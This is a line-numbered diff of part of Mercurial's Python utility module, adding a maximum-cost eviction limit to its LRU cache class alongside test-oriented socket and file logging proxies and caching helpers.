583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_into', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
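# A minimal usage sketch ('ui', the file name, and the label are
# hypothetical stand-ins):
#
#   fh = makeloggingfileobject(ui.ferr, open(b'data.bin', 'rb'), b'data',
#                              logdata=True)
#   fh.read(4)  # logs e.g. "data> read(4) -> 4: ..." to ui.ferr
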
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keyword args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
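# A minimal sketch of cachefunc used as a decorator (the function below is
# a hypothetical example):
#
#   @cachefunc
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)
#
# Repeated calls with the same positional argument hit the cache; keyword
# arguments are not handled (see the XXX above).
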
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
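# A minimal usage sketch ('tr' stands in for a real transaction object):
#
#   with acceptintervention(tr):
#       dowork()  # may raise error.InterventionRequired
#
# On InterventionRequired the transaction is closed (kept) before the
# exception propagates; otherwise it is closed on success. Either way it
# is released.
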
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220 self.cost = 0
1221 1221
1222 1222 def markempty(self):
1223 1223 """Mark the node as emptied."""
1224 1224 self.key = _notset
1225 1225 self.value = None
1226 1226 self.cost = 0
1227 1227
1228 1228 class lrucachedict(object):
1229 1229 """Dict that caches most recent accesses and sets.
1230 1230
1231 1231 The dict consists of an actual backing dict - indexed by original
1232 1232 key - and a doubly linked circular list defining the order of entries in
1233 1233 the cache.
1234 1234
1235 1235 The head node is the newest entry in the cache. If the cache is full,
1236 1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 1237 the node being moved to before the existing head and being marked as the
1238 1238 new head node.
1239 1239
1240 1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 1241 simply an integer that is specified by the caller. The cache can be queried
1242 1242 for the total cost of all items presently in the cache.
1243
1244 The cache can also define a maximum cost. If a cache insertion would
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 nodes will be evicted to make room for the new node. This can be used
1247 to e.g. set a max memory limit and associate an estimated byte size
1248 cost with each item in the cache. By default, no maximum cost is enforced.
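
A doctest-style sketch of the cost behavior (illustrative; relies on the
eviction rule described above):

>>> d = lrucachedict(4, maxcost=10)
>>> d.insert(b'a', b'va', cost=4)
>>> d.insert(b'b', b'vb', cost=4)
>>> d.totalcost
8
>>> d.insert(b'c', b'vc', cost=4)
>>> b'a' in d  # oldest entry evicted to get back under maxcost
False
>>> d.totalcost
8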
1243 1249 """
1244 def __init__(self, max):
1250 def __init__(self, max, maxcost=0):
1245 1251 self._cache = {}
1246 1252
1247 1253 self._head = head = _lrucachenode()
1248 1254 head.prev = head
1249 1255 head.next = head
1250 1256 self._size = 1
1251 1257 self.capacity = max
1252 1258 self.totalcost = 0
1259 self.maxcost = maxcost
1253 1260
1254 1261 def __len__(self):
1255 1262 return len(self._cache)
1256 1263
1257 1264 def __contains__(self, k):
1258 1265 return k in self._cache
1259 1266
1260 1267 def __iter__(self):
1261 1268 # We don't have to iterate in cache order, but why not.
1262 1269 n = self._head
1263 1270 for i in range(len(self._cache)):
1264 1271 yield n.key
1265 1272 n = n.next
1266 1273
1267 1274 def __getitem__(self, k):
1268 1275 node = self._cache[k]
1269 1276 self._movetohead(node)
1270 1277 return node.value
1271 1278
1272 1279 def insert(self, k, v, cost=0):
1273 1280 """Insert a new item in the cache with optional cost value."""
1274 1281 node = self._cache.get(k)
1275 1282 # Replace existing value and mark as newest.
1276 1283 if node is not None:
1277 1284 self.totalcost -= node.cost
1278 1285 node.value = v
1279 1286 node.cost = cost
1280 1287 self.totalcost += cost
1281 1288 self._movetohead(node)
1289
1290 if self.maxcost:
1291 self._enforcecostlimit()
1292
1282 1293 return
1283 1294
1284 1295 if self._size < self.capacity:
1285 1296 node = self._addcapacity()
1286 1297 else:
1287 1298 # Grab the last/oldest item.
1288 1299 node = self._head.prev
1289 1300
1290 1301 # At capacity. Kill the old entry.
1291 1302 if node.key is not _notset:
1292 1303 self.totalcost -= node.cost
1293 1304 del self._cache[node.key]
1294 1305
1295 1306 node.key = k
1296 1307 node.value = v
1297 1308 node.cost = cost
1298 1309 self.totalcost += cost
1299 1310 self._cache[k] = node
1300 1311 # And mark it as newest entry. No need to adjust order since it
1301 1312 # is already self._head.prev.
1302 1313 self._head = node
1303 1314
1315 if self.maxcost:
1316 self._enforcecostlimit()
1317
1304 1318 def __setitem__(self, k, v):
1305 1319 self.insert(k, v)
1306 1320
1307 1321 def __delitem__(self, k):
1308 1322 node = self._cache.pop(k)
1309 1323 self.totalcost -= node.cost
1310 1324 node.markempty()
1311 1325
1312 1326 # Temporarily mark as newest item before re-adjusting head to make
1313 1327 # this node the oldest item.
1314 1328 self._movetohead(node)
1315 1329 self._head = node.next
1316 1330
1317 1331 # Additional dict methods.
1318 1332
1319 1333 def get(self, k, default=None):
1320 1334 try:
1321 1335 return self._cache[k].value
1322 1336 except KeyError:
1323 1337 return default
1324 1338
1325 1339 def clear(self):
1326 1340 n = self._head
1327 1341 while n.key is not _notset:
1328 1342 self.totalcost -= n.cost
1329 1343 n.markempty()
1330 1344 n = n.next
1331 1345
1332 1346 self._cache.clear()
1333 1347
1334 def copy(self, capacity=None):
1348 def copy(self, capacity=None, maxcost=0):
1335 1349 """Create a new cache as a copy of the current one.
1336 1350
1337 1351 By default, the new cache has the same capacity as the existing one.
1338 1352 But, the cache capacity can be changed as part of performing the
1339 1353 copy.
1340 1354
1341 1355 Items in the copy have an insertion/access order matching this
1342 1356 instance.
1343 1357 """
1344 1358
1345 1359 capacity = capacity or self.capacity
1346 result = lrucachedict(capacity)
1360 maxcost = maxcost or self.maxcost
1361 result = lrucachedict(capacity, maxcost=maxcost)
1347 1362
1348 1363 # We copy entries by iterating in oldest-to-newest order so the copy
1349 1364 # has the correct ordering.
1350 1365
1351 1366 # Find the first non-empty entry.
1352 1367 n = self._head.prev
1353 1368 while n.key is _notset and n is not self._head:
1354 1369 n = n.prev
1355 1370
1356 1371 # We could potentially skip the first N items when decreasing capacity.
1357 1372 # But let's keep it simple unless it is a performance problem.
1358 1373 for i in range(len(self._cache)):
1359 1374 result.insert(n.key, n.value, cost=n.cost)
1360 1375 n = n.prev
1361 1376
1362 1377 return result
1363 1378
1364 1379 def popoldest(self):
1365 1380 """Remove the oldest item from the cache.
1366 1381
1367 1382 Returns the (key, value) describing the removed cache entry.
1368 1383 """
1369 1384 if not self._cache:
1370 1385 return
1371 1386
1372 1387 # Walk the linked list backwards starting at tail node until we hit
1373 1388 # a non-empty node.
1374 1389 n = self._head.prev
1375 1390 while n.key is _notset:
1376 1391 n = n.prev
1377 1392
1378 1393 key, value = n.key, n.value
1379 1394
1380 1395 # And remove it from the cache and mark it as empty.
1381 1396 del self._cache[n.key]
1382 1397 self.totalcost -= n.cost
1383 1398 n.markempty()
1384 1399
1385 1400 return key, value
1386 1401
1387 1402 def _movetohead(self, node):
1388 1403 """Mark a node as the newest, making it the new head.
1389 1404
1390 1405 When a node is accessed, it becomes the freshest entry in the LRU
1391 1406 list, which is denoted by self._head.
1392 1407
1393 1408 Visually, let's make ``N`` the new head node (* denotes head):
1394 1409
1395 1410 previous/oldest <-> head <-> next/next newest
1396 1411
1397 1412 ----<->--- A* ---<->-----
1398 1413 | |
1399 1414 E <-> D <-> N <-> C <-> B
1400 1415
1401 1416 To:
1402 1417
1403 1418 ----<->--- N* ---<->-----
1404 1419 | |
1405 1420 E <-> D <-> C <-> B <-> A
1406 1421
1407 1422 This requires the following moves:
1408 1423
1409 1424 C.next = D (node.prev.next = node.next)
1410 1425 D.prev = C (node.next.prev = node.prev)
1411 1426 E.next = N (head.prev.next = node)
1412 1427 N.prev = E (node.prev = head.prev)
1413 1428 N.next = A (node.next = head)
1414 1429 A.prev = N (head.prev = node)
1415 1430 """
1416 1431 head = self._head
1417 1432 # C.next = D
1418 1433 node.prev.next = node.next
1419 1434 # D.prev = C
1420 1435 node.next.prev = node.prev
1421 1436 # N.prev = E
1422 1437 node.prev = head.prev
1423 1438 # N.next = A
1424 1439 # It is tempting to do just "head" here, but if node is
1425 1440 # adjacent to head, this will corrupt the list.
1426 1441 node.next = head.prev.next
1427 1442 # E.next = N
1428 1443 node.next.prev = node
1429 1444 # A.prev = N
1430 1445 node.prev.next = node
1431 1446
1432 1447 self._head = node
1433 1448
1434 1449 def _addcapacity(self):
1435 1450 """Add a node to the circular linked list.
1436 1451
1437 1452 The new node is inserted before the head node.
1438 1453 """
1439 1454 head = self._head
1440 1455 node = _lrucachenode()
1441 1456 head.prev.next = node
1442 1457 node.prev = head.prev
1443 1458 node.next = head
1444 1459 head.prev = node
1445 1460 self._size += 1
1446 1461 return node
1447 1462
1463 def _enforcecostlimit(self):
1464 # This should run after an insertion. It should only be called if total
1465 # cost limits are being enforced.
1466 # The most recently inserted node is never evicted.
1467 while len(self) > 1 and self.totalcost > self.maxcost:
1468 self.popoldest()
1469
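# A minimal usage sketch of the cost-limited cache (illustrative only;
# the keys, values, and costs below are made up):
#
#   d = lrucachedict(4, maxcost=10)
#   d.insert(b'a', b'va', cost=4)
#   d.insert(b'b', b'vb', cost=2)   # totalcost is now 6
#   d.insert(b'c', b'vc', cost=5)   # totalcost would be 11 > 10, so the
#                                   # oldest entry (b'a') is evicted
#   assert b'a' not in d
#   assert d.totalcost == 7
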
1448 1470 def lrucachefunc(func):
1449 1471 '''cache most recent results of function calls'''
1450 1472 cache = {}
1451 1473 order = collections.deque()
1452 1474 if func.__code__.co_argcount == 1:
1453 1475 def f(arg):
1454 1476 if arg not in cache:
1455 1477 if len(cache) > 20:
1456 1478 del cache[order.popleft()]
1457 1479 cache[arg] = func(arg)
1458 1480 else:
1459 1481 order.remove(arg)
1460 1482 order.append(arg)
1461 1483 return cache[arg]
1462 1484 else:
1463 1485 def f(*args):
1464 1486 if args not in cache:
1465 1487 if len(cache) > 20:
1466 1488 del cache[order.popleft()]
1467 1489 cache[args] = func(*args)
1468 1490 else:
1469 1491 order.remove(args)
1470 1492 order.append(args)
1471 1493 return cache[args]
1472 1494
1473 1495 return f
1474 1496
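# Illustrative use of lrucachefunc (the wrapped function is made up);
# roughly the 20 most recently used argument sets are retained:
#
#   @lrucachefunc
#   def expensivelookup(key):
#       return computesomething(key)   # hypothetical expensive call
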
1475 1497 class propertycache(object):
1476 1498 def __init__(self, func):
1477 1499 self.func = func
1478 1500 self.name = func.__name__
1479 1501 def __get__(self, obj, type=None):
1480 1502 result = self.func(obj)
1481 1503 self.cachevalue(obj, result)
1482 1504 return result
1483 1505
1484 1506 def cachevalue(self, obj, value):
1485 1507 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1486 1508 obj.__dict__[self.name] = value
1487 1509
1488 1510 def clearcachedproperty(obj, prop):
1489 1511 '''clear a cached property value, if one has been set'''
1490 1512 if prop in obj.__dict__:
1491 1513 del obj.__dict__[prop]
1492 1514
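# Illustrative sketch of propertycache (class and attribute names are
# made up): the first access runs the function, then cachevalue() stores
# the result in the instance __dict__, shadowing the descriptor so later
# accesses are plain attribute lookups.
#
#   class example(object):
#       @propertycache
#       def expensive(self):
#           return computeexpensively()   # hypothetical
#
#   # and to force recomputation on the next access:
#   clearcachedproperty(obj, 'expensive')
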
1493 1515 def increasingchunks(source, min=1024, max=65536):
